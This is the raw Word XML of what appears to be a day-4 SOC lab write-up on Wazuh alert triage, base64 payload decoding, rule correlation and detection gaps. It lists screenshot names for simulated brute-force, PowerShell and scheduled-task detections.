          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Alert Triage</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="595959"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Reading expanded events in Discover and extracting key facts: who, what, when, from where. Every alert investigation starts here.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="60" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Base64 Decoding</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="595959"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Decoding attacker payloads to understand true intent. echo "[base64]" | base64 -d is a daily task for analysts investigating PowerShell-based attacks.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="60" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Alert Correlation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="595959"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Rules 100002 and 100003 fired at the same timestamp from the same host. Recognizing these as one attack seen through two detection lenses rather than two separate incidents.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="60" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">4. Detection Gap Analysis</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="595959"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Recognizing what Wazuh can and cannot see, and identifying mitigations. Understanding the limits of your detection stack is L2-level thinking that separates reactive analysts from proactive ones.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="60" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">5. Attacker Perspective</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="595959"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Understanding WHY attackers use encoded commands, scheduled tasks with legitimate-sounding names, and network protocols that bypass endpoint logging.</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Screenshots</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="595959"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">day04-screenshot-01-4625-failed-logons-net-use.png — 4625 events in Discover from net use simulation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="595959"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">day04-screenshot-02-hydra-smb-detection-gap.png — Hydra SMB failure with zero 4625 events</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="595959"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">day04-screenshot-03-rule100006-brute-force-detected.png — Rule 100006 alert in Wazuh Discover</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="595959"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">day04-screenshot-04-rule100002-100003-powershell-attacks.png — Both PowerShell rules firing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="595959"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">day04-screenshot-05-ubuntu-alert-stream-all-rules-firing.png — Live alert stream on manager</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="595959"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">day04-screenshot-06-scheduled-task-4698-persistence.png — Event 4698 scheduled task creation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2026-04-24T15:04:01.682Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-04-24T15:04:01.683Z</dcterms:modified>
</cp:coreProperties>
</file>

<file path=docProps/custom.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/custom-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"/>
</file>